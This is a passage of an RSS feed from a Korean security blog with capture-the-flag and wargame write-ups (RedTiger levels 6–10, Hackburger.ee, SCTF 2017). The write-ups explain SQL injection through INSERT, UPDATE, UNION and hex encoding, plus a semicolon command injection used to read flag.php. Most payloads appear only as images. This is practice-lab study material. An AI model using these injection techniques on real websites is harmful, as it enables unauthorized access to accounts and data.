size=&quot;3&quot;&gt;&lt;span style=&quot;white-space: pre-wrap;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;boolean 타입으로 password 변수를 지정해준 후 1을 넘겨주어 true를 반환시키면 TheMaster 계정으로 로그인 할 수 있다.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;</description>
      <category>Wargame/RedTiger:OverTheWire</category>
      <category>Level 10</category>
      <category>overthewire</category>
      <category>php</category>
      <category>redtiger</category>
      <category>Serialize</category>
      <category>SQL Injection</category>
      <category>sqli</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/241</guid>
      <comments>https://choiys.tistory.com/entry/RedTiger-Level-10#entry241comment</comments>
      <pubDate>Tue, 7 Nov 2017 20:02:58 +0900</pubDate>
    </item>
    <item>
      <title>[RedTiger] Level 9</title>
      <link>https://choiys.tistory.com/entry/RedTiger-Level-9</link>
      <description>&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 759px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99F4CD335A00491413&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99F4CD335A00491413&quot; width=&quot;759&quot; height=&quot;427&quot; filename=&quot;1_prob.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;문제에 접속하면 Name과 Title, Content로 보이는 부분을 입력하는 폼이 존재한다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;SQLi가 바탕인 RedTiger 문제이기 때문에 왠지 insert 구문을 이용하여 데이터를 추가 할 것 같다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 755px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/999629335A00491431&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F999629335A00491431&quot; width=&quot;755&quot; height=&quot;394&quot; filename=&quot;2_입력결과.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;이는 Name에 1, Title에 2, Content에 3을 입력하여 제출 했을 때의 결과이다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;mysql의 insert 구문에서는 parentheses를 필터링 하지 않을 경우 사용자의 입력값에 따라 데이터의 중복 삽입을 유발할 수 있다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;이 문제의 경우 모든 입력값에 대해 single quotation으로 묶여있는 형태인데, Name과 Title의 경우에는 single quotation을 \'로 치환하여 특수문자가 아닌 단일문자로 사용하는 반면 Content 부분에서는 이를 필터링하지 않아 string의 끝을 의미하는 quotation으로 적용된다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;mysql에서는 insert 구문 사용 시 insert into table_name values(val1,val2,val3),(val4,val5,val6),... 등으로 데이터를 중복 삽입 할 수 있다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99323A335A004ADE15&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99323A335A004ADE15&quot; width=&quot;900&quot; height=&quot;146&quot; filename=&quot;4_insert.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;이를 이용하여 Content 부분에 single quotation을 포함하여 데이터를 중복 삽입하고, 데이터를 삽입하는 위치에 select 구문을 이용하여 level9_users 테이블의 username과 password를 추출해낼 수 있다.&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;이를 이용해 얻어낸 username과 password를 하단의 입력 폼에 넣어 요청하면 플래그를 얻을 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>Wargame/RedTiger:OverTheWire</category>
      <category>INSERT</category>
      <category>level9</category>
      <category>overthewire</category>
      <category>redtiger</category>
      <category>SQL Injection</category>
      <category>sqli</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/240</guid>
      <comments>https://choiys.tistory.com/entry/RedTiger-Level-9#entry240comment</comments>
      <pubDate>Mon, 6 Nov 2017 20:45:16 +0900</pubDate>
    </item>
    <item>
      <title>[RedTiger] Level8</title>
      <link>https://choiys.tistory.com/entry/RedTiger-Level8</link>
      <description>&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 287px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99E9AF3359F9A93716&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99E9AF3359F9A93716&quot; width=&quot;287&quot; height=&quot;336&quot; filename=&quot;1_prob.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Level8은 admin 계정의 패스워드를 알아내라고 합니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Edit 버튼을 누르면 정보가 갱신되며, 이는 곧 update 구문을 이용한 것이라고 생각 할 수 있습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;따라서 update [table명] set [attribute1=value1, attribute2=value2, ...]의 형태이기 때문에 single quotation을 추가하여 다른 속성의 값을 중복 변경 할 수 있습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;single quotation만을 입력했을 때 나타나는 오류로 보아 update 구문에 적용되는 속성의 순서는 다음과 같습니다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9953943359F9AA162E&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9953943359F9AA162E&quot; width=&quot;900&quot; height=&quot;95&quot; filename=&quot;2_속성.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;name, username, email, icq, age 의 순서로 update 되기 때문에 가장 먼저 나타나는 name의 속성의 값을 password로 변경한다면 Admin 계정의 패스워드를 알아낼 수 있습니다.&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/991BCC3359F9AA171E&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F991BCC3359F9AA171E&quot; width=&quot;900&quot; height=&quot;563&quot; filename=&quot;3_payload.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>Wargame/RedTiger:OverTheWire</category>
      <category>level8</category>
      <category>overthewire</category>
      <category>redtiger</category>
      <category>SQL Injection</category>
      <category>sqli</category>
      <category>Update</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/239</guid>
      <comments>https://choiys.tistory.com/entry/RedTiger-Level8#entry239comment</comments>
      <pubDate>Wed, 1 Nov 2017 20:05:29 +0900</pubDate>
    </item>
    <item>
      <title>[RedTiger] Level7</title>
      <link>https://choiys.tistory.com/entry/RedTiger-Level7</link>
      <description>&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 714px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9919923359F98E5C2E&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9919923359F98E5C2E&quot; width=&quot;714&quot; height=&quot;165&quot; filename=&quot;1_prob.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;textbox에 있는 내용은 search 파라미터를 통해 post로 전송되며, single quotation과 함께 전송하면 SQLi를 유발시킬 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;이 때 에러 메시지를 통해 쿼리문 전체를 알아낼 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%a'%' OR text.title LIKE '%a'%')&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;like문에서 SQLi가 발생하며, parentheses를 열고 닫음으로 구문을 마무리 후 union을 통해 원하는 컬럼을 추출해낼 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99DD733359F98EF414&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99DD733359F98EF414&quot; width=&quot;900&quot; height=&quot;563&quot; filename=&quot;2_payload.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;이 중 TestUserforg00gle이 username이 되며, 이를 입력하면 플래그를 얻을 수 있다.&lt;/p&gt;</description>
      <category>Wargame/RedTiger:OverTheWire</category>
      <category>level7</category>
      <category>overthewire</category>
      <category>redtiger</category>
      <category>SQL Injection</category>
      <category>sqli</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/238</guid>
      <comments>https://choiys.tistory.com/entry/RedTiger-Level7#entry238comment</comments>
      <pubDate>Wed, 1 Nov 2017 18:09:29 +0900</pubDate>
    </item>
    <item>
      <title>[RedTiger] Level6</title>
      <link>https://choiys.tistory.com/entry/RedTiger-Level6</link>
      <description>&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 541px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/991E383359F983671C&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F991E383359F983671C&quot; width=&quot;541&quot; height=&quot;321&quot; filename=&quot;1_prob.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;user 파라미터(integer)를 입력받아 Username과 Email을 출력해준다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;?user[]=1과 같이 입력해주면 mysql_real_escape_string() 함수를 사용하는 것을 확인 할 수 있다. 따라서 single quotation과 같은 특수문자는 사용이 불가하다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;하지만 integer 기반 쿼리이기 때문에 single quotation 없이 SQLi가 가능하며, union select 구문을 사용할 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;또한 like와 parentheses 등 주요 기능이 필터링 되어 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;union을 사용하다 보면 2번째 컬럼에서 username의 이름을 넣어주면 쿼리가 정상 동작하는 것을 알 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;여기서 username 컬럼에 deddlef를 hex encoding 하여 보내줘도 동일한 결과가 출력되는 것을 알 수 있으며, deddlef'는 에러가, deddlef'#는 에러가 발생하지 않는 것을 확인 할 수 있었다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;여기서 출력되는 쿼리의 결과에서 username 부분을 새로운 쿼리에 넣어 실행, 결과를 출력하는 것이라 예상 할 수 있으며 exploit code를&amp;nbsp;hex encoding 하여 보내주면 패스워드를 얻어낼 수 있다.&lt;/p&gt;</description>
      <category>Wargame/RedTiger:OverTheWire</category>
      <category>level6</category>
      <category>overthewire</category>
      <category>redtiger</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/237</guid>
      <comments>https://choiys.tistory.com/entry/RedTiger-Level6#entry237comment</comments>
      <pubDate>Wed, 1 Nov 2017 17:26:28 +0900</pubDate>
    </item>
    <item>
      <title>[Hackburger.ee] Warmup</title>
      <link>https://choiys.tistory.com/entry/Hackburgeree-Warmup</link>
      <description>&lt;h1&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;10pts&lt;/span&gt;&lt;/h1&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h2&gt;&lt;span style=&quot;color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);&quot;&gt;1. Overview&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99CC103359BA65F121&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99CC103359BA65F121&quot; width=&quot;900&quot; height=&quot;129&quot; filename=&quot;스크린샷 2017-09-14 오후 8.00.38.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;div&gt;1)&amp;nbsp;문제에 접속해서 description을 살펴보면 ping을 날려주는 웹페이지인 것으로 추정할 수 있다.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 268px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9941253359BA65C80F&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9941253359BA65C80F&quot; width=&quot;268&quot; height=&quot;138&quot; filename=&quot;스크린샷 2017-09-14 오후 7.59.00.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;2) 문제 페이지에 접속해보면 아래와 같은 텍스트 폼이 나타난다.&lt;/div&gt;&lt;h2&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;2. Theory&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;text-align: left; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 469px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99D82E3359BA65C824&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99D82E3359BA65C824&quot; width=&quot;469&quot; height=&quot;231&quot; filename=&quot;스크린샷 2017-09-14 오후 7.59.16.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;1) IP를 입력하면 ping을 날리고, 그에 대한 응답을 출력해주는 것을 확인 할 수 있다.&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;2) 문제에 대한 별다른 설명이 없으므로 이는 리눅스 기본 명령어인 ping을 사용할 것이라 가정했다.&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;3) 그렇다면 생각 할 수 있는 취약점은 Command Injection이 될 것이다.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h2&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;3. Exploit&lt;/span&gt;&lt;/h2&gt;&lt;p&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 277px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9917F83359BA65C818&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9917F83359BA65C818&quot; width=&quot;277&quot; height=&quot;216&quot; filename=&quot;스크린샷 2017-09-14 오후 7.59.27.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;기본적인 command injection의 형태인 세미콜론(;)을 이용하였다. ls 명령어를 injection하면 현재 디렉토리의 파일 목록이 출력되는 것을 확인할 수 있다.&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 272px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9906373359BA65C91A&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9906373359BA65C91A&quot; width=&quot;272&quot; height=&quot;171&quot; filename=&quot;스크린샷 2017-09-14 오후 7.59.49.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;flag.php가 있으므로 cat으로 찍어주도록 하자.&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 452px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9988E93359BA65C902&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9988E93359BA65C902&quot; width=&quot;452&quot; height=&quot;342&quot; filename=&quot;스크린샷 2017-09-14 오후 7.59.56.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;view-source를 이용하면 숨겨진 php 파일 내용을 확인 할 수 있다.&lt;/p&gt;&lt;p style=&quot;clear: none; float: none;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>Wargame/Hackburger.ee</category>
      <category>hackburger</category>
      <category>warmup</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/236</guid>
      <comments>https://choiys.tistory.com/entry/Hackburgeree-Warmup#entry236comment</comments>
      <pubDate>Thu, 14 Sep 2017 20:25:07 +0900</pubDate>
    </item>
    <item>
      <title>[SCTF 2017] Attack - Letter to me(300 pts)</title>
      <link>https://choiys.tistory.com/entry/SCTF-2017-Attack-Letter-to-me300-pts</link>
      <description>&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:10pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:16pt;font-family:'Open Sans';color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;Attack - Letter To Me(300 pts)&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot; id=&quot;docs-internal-guid-6c0356e8-727d-f013-7898-8da2fb5c36ef&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/SwLP8zR_c2W1rQ0VyFrISWfaZtpcywfSiGMlLhnfX_LjFw68b-9VOjCdJHCh1NjH5vm1jkxCveK84VikXMws9b9SedWf8eRDWompwHS6rK09ik4kmfIuWet8dxUGVmG86-GWNGgJ&quot; width=&quot;624&quot; height=&quot;199&quot; style=&quot;border: 2pt solid #a4c2f4; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;문제를 살펴보면 플래그는 DB 안에 있다는 힌트가 있으며, sql 파일과 서버 주소를 던져줬다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;sql 파일을 살펴보면 아래와 같다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/wsUm1Fa_7Zv6qEOD-1eumZAViI_9aL02igliuZ9IKehhYrKbuFVaKdLxaVYnm1ayeswiENoE5fXGZZvNocElc0ZLK1jk4DvNgCu7TpNDDJAmotFVattCPlpEckv9E64JI8_m0m7U&quot; width=&quot;624&quot; height=&quot;383&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/V_LHsPX5GILO8_MF0LvVVMxIqxT_0G6Z0bChwhvxIiBHGYn6BiTjhCh2w4esygdX434gdOTu_JJ0J919iB-Pf2bA2lSfeNF0b130fLW7_aCduOdCuIMnmhBGJbCjNALavK97X9gb&quot; width=&quot;624&quot; height=&quot;133&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;메인 페이지는 위와 같다. login페이지와 register 페이지가 있는 것을 확인 할 수 있다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/6Fb3x98IIrHlKaWcbZiPMQ-ixbL6F7RP7V__iY1p4h7nJ9a_IwDv9Y1jcS8oA0b--0qIaZk_lYgcCko36Qlcmkx5LpniIoO_93Ku_fT_CQL-8fJZnF1N4deuU-JQYW0MZZUtmJfS&quot; width=&quot;386&quot; height=&quot;245&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; 